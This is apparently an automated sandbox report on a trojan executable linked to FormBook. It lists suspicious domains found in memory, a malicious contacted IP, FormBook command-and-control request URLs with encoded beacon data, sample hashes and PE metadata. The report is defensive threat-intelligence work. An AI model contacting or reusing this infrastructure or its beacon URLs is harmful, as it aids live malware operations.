                                                                                            http://www.onnorbell.designReferer:explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000003.00000000.1728291050.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://outlook.com_explorer.exe, 00000003.00000002.4180055463.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1738643727.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.fontbureau.com/designersGn0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.ehills.shop/m25s/www.uy-smart-tv-nl.todayexplorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://www.fontbureau.com/designers/?n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.founder.com.cn/cn/bThen0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.39474.clubReferer:explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://www.fontbureau.com/designers?n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000003.00000002.4172464480.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.cctofi.cpaReferer:explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://powerpoint.office.comcemberexplorer.exe, 00000003.00000002.4180055463.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1738643727.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://www.cctofi.cpaexplorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.tiro.comn0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://www.newordforpurpose.info/m25s/explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    http://www.ental-health-69511.bondexplorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    http://www.oches-a-credito-es.bondReferer:explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    http://www.uy-smart-tv-nl.todayexplorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    http://www.goodfont.co.krn0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://schemas.microexplorer.exe, 00000003.00000002.4175505713.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4174803690.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4177373939.0000000009B60000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://www.xewaov.xyzexplorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        http://www.typography.netDn0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://www.wistlnc.netReferer:explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          http://www.ehills.shopexplorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          http://www.galapagosdesign.com/staff/dennis.htmn0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://www.ental-health-69511.bondReferer:explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://www.vitor.liveReferer:explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              http://www.onnorbell.design/m25s/explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://api.msn.com/qexplorer.exe, 00000003.00000003.3107210219.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1732979117.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4176155250.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://www.ealthcare-trends-60670.bondReferer:explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  http://www.cctofi.cpa/m25s/explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://www.orean-course-289113002.zone/m25s/explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    http://www.fonts.comn0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://www.sandoll.co.krn0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          		high

                                                                                                                                          World Map of Contacted IPs

                                                                                                                                          • No. of IPs < 25%
                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                          • 75% < No. of IPs

                                                                                                                                          Public IPs

                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                          103.224.212.213
                                                                                                                                          		www.vitor.liveAustralia
                                                                                                                                          		133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue

                                                                                                                                          General Information

                                                                                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                                                                                          Analysis ID:1587617
                                                                                                                                          Start date and time:2025-01-10 15:48:03 +01:00
                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                          Overall analysis duration:0h 10m 50s
                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                          Report type:full
                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                          Number of analysed new started processes analysed:9
                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                          Number of injected processes analysed:1
                                                                                                                                          Technologies:
                                                                                                                                          • HCA enabled
                                                                                                                                          • EGA enabled
                                                                                                                                          • AMSI enabled
                                                                                                                                          Analysis Mode:default
                                                                                                                                          Sample name:n0srYVYMDI.exe
                                                                                                                                          renamed because original name is a hash value
                                                                                                                                          Original Sample Name:067d0a32b11208193e232f3b4d05b24f0d730ffb23049a1611be068738b9d11c.exe
                                                                                                                                          Detection:MAL
                                                                                                                                          Classification:mal100.troj.evad.winEXE@8/1@12/1
                                                                                                                                          EGA Information:
                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                          HCA Information:
                                                                                                                                          • Successful, ratio: 98%
                                                                                                                                          • Number of executed functions: 113
                                                                                                                                          • Number of non-executed functions: 349
                                                                                                                                          Cookbook Comments:
                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                          Warnings

                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                          • Excluded IPs from analysis (whitelisted): 2.23.242.162, 20.12.23.50, 13.107.246.45
                                                                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                          • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                          Simulations

                                                                                                                                          Behavior and APIs

                                                                                                                                          TimeTypeDescription
                                                                                                                                          09:48:59API Interceptor1x Sleep call for process: n0srYVYMDI.exe modified
                                                                                                                                          09:49:00API Interceptor6787574x Sleep call for process: explorer.exe modified
                                                                                                                                          09:49:43API Interceptor6003094x Sleep call for process: cmd.exe modified

                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                          IPs

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          103.224.212.213Employee performance.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • www.warpateam.com/lm31/?IR-4WR=je5vN1uA9yEmYEN49dayIwTCku09UgHsksm87SEwvw14I11Hwk0s9tmois1WiUPsr2unY/WNgA==&vN=I0D4IvR
                                                                                                                                          8tvMmyxveyzFcnJ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • www.at89v2.com/mc10/?M6=+PshiMmsD3s2EuJ9KF3baeU+rJnvgbutDGTUYWD/T/xNi6HtTgrR7YeDwlLM6QRR03T9&sZ=Ynzp6xUh
                                                                                                                                          tYEY1UeurGz0Mjb.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • www.serco2020.com/dy13/?IR=7H41Cx9M/9Klm4wO2KyYkeGFvajkB7bQdwjfmZPzOjV6ZXjzQq6V6P6jcCKZla+kGSS1&nL=S4247TXPfxsLR
                                                                                                                                          yPURXYpFVuXra2o.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • www.bolinkpass.club/cr12/?XDHHT=vl9/KZA8hSVZlZYYRwiRPHDwK+fMeRW7mLcdcO2HrZ8WCY+A9QkbN6YtC02r8Olco4RS&MZt0=njKl2H4htFXPs
                                                                                                                                          Ajanlatkeres_2024.05.29.PDF.exeGet hashmaliciousFormBook, LokibotBrowse
                                                                                                                                          • www.vivaness.club/dn03/?KvOx3=rTguiTyPWe+LQ3wbOsvLrlRt5HkRD6mO+8zHcQ1TTPZ93ZKF8Svri6qQbYlnCi86X6wl&LhEx=ODKXZDVpY2w8gpmp
                                                                                                                                          Solicitud de pedido Documento No 168646080.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                          • www.yassa-hany.online/pz08/?cx=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuMZpBqNAn8DKeRhHzw==&CR=_DHhAtX
                                                                                                                                          DHL Factura Electronica Pendiente documento No 04BB25083.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                          • www.yassa-hany.online/pz08/?N6Ahw=3ffl2F0Punah42&Ap=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuP1PGrx4qdiR
                                                                                                                                          PaDQmSw2ud.dllGet hashmaliciousLaplas ClipperBrowse
                                                                                                                                          • searchseedphase.online/bot/regex
                                                                                                                                          PaDQmSw2ud.dllGet hashmaliciousLaplas ClipperBrowse
                                                                                                                                          • searchseedphase.online/bot/regex
                                                                                                                                          Documento de confirmacion de orden de compra OC 1580070060.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • www.yassa-hany.online/pz08/?mzrPV4R=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuMVpBqNDhq+c&Rl=8pFP0r98Chvt5p5P

                                                                                                                                          Domains

                                                                                                                                          No context

                                                                                                                                          ASNs

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          TRELLIAN-AS-APTrellianPtyLimitedAUhttp://www.jmclmedia.phGet hashmaliciousUnknownBrowse
                                                                                                                                          • 103.224.182.206
                                                                                                                                          NkMMNoILv9.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 103.224.212.212
                                                                                                                                          http://www.finanzamthessen.deGet hashmaliciousUnknownBrowse
                                                                                                                                          • 103.224.182.245
                                                                                                                                          https://tfsroanoke.com/home/tfs/public_html/new/ckfinder/userfiles/files/12719803849.pdfGet hashmaliciousPDFPhishBrowse
                                                                                                                                          • 103.224.182.253
                                                                                                                                          PO1341489LTB GROUP.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                          • 103.224.182.242
                                                                                                                                          http://www.firsthealthbp.comGet hashmaliciousUnknownBrowse
                                                                                                                                          • 103.224.212.254
                                                                                                                                          PO2412010.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 103.224.182.242
                                                                                                                                          http://divisioninfo.net/Get hashmaliciousUnknownBrowse
                                                                                                                                          • 103.224.182.251
                                                                                                                                          Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                          • 103.224.182.242
                                                                                                                                          Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 103.224.182.242

                                                                                                                                          JA3 Fingerprints

                                                                                                                                          No context

                                                                                                                                          Dropped Files

                                                                                                                                          No context

                                                                                                                                          Created / dropped Files

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\n0srYVYMDI.exe.log

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\Desktop\n0srYVYMDI.exe
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1216
                                                                                                                                          Entropy (8bit):5.34331486778365
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:ML9E4KiE4Kx1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MxHKiHKx1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                          MD5:8B21C0FDF91680677FEFC8890882FD1F
                                                                                                                                          SHA1:E15AC7685BFC89F63015C29DE7F6BCE7A1A9F0E7
                                                                                                                                          SHA-256:E2F188397C73C8150EE6F09E833E4D1ABA01293CCFDFED61981F5F66660731F9
                                                                                                                                          SHA-512:1EFDF56115A8688CA2380F3047A28CA3E03C74369C3A377050066A56B8171AD756F7DD7AA29F5648A84D16812D1B422749259ED47447713E9B3A0834CE361BE7
                                                                                                                                          Malicious:true
                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                          Static File Info

                                                                                                                                          General

                                                                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                          Entropy (8bit):7.710270911108727
                                                                                                                                          TrID:
                                                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                          • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                          File name:n0srYVYMDI.exe
                                                                                                                                          File size:766'464 bytes
                                                                                                                                          MD5:7d311cdceda373fd94310919b7bdc784
                                                                                                                                          SHA1:9e1504e3148829775ef7d1c80095dda1fb725e73
                                                                                                                                          SHA256:067d0a32b11208193e232f3b4d05b24f0d730ffb23049a1611be068738b9d11c
                                                                                                                                          SHA512:d9d8ba2bdc04c32c542e1b26ee538de89d758a4895deb9fe49ff64fcb3e9d9246a02bf160d05aecaeaa7dffd55fd8b5889d7cb2949407058607fa689d4ca513e
                                                                                                                                          SSDEEP:12288:2FuUyDYcTGfg3IzN6SJ0OSNAwmeU1Lq7LbgpL5hLavGrgjYNvxtSE+nY:t2gqqqNVMA1qXbabLajWon
                                                                                                                                          TLSH:E3F4F11C7A53AE04CB6C9A3BC4632B0C8567D992F026F3FB98D85CE54E72A44C54FD86
                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g................................. ........@.. ....................................@................................

                                                                                                                                          File Icon

                                                                                                                                          Icon Hash:41a400a4a4000000

                                                                                                                                          Static PE Info

                                                                                                                                          General

                                                                                                                                          Entrypoint:0x4bba1e
                                                                                                                                          Entrypoint Section:.text
                                                                                                                                          Digitally signed:false
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          Subsystem:windows gui
                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                          Time Stamp:0x670700DE [Wed Oct 9 22:17:02 2024 UTC]
                                                                                                                                          TLS Callbacks:
                                                                                                                                          CLR (.Net) Version:
                                                                                                                                          OS Version Major:4
                                                                                                                                          OS Version Minor:0
                                                                                                                                          File Version Major:4
                                                                                                                                          File Version Minor:0
                                                                                                                                          Subsystem Version Major:4
                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                          Entrypoint Preview

                                                                                                                                          Instruction
                                                                                                                                          jmp dword ptr [00402000h]
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
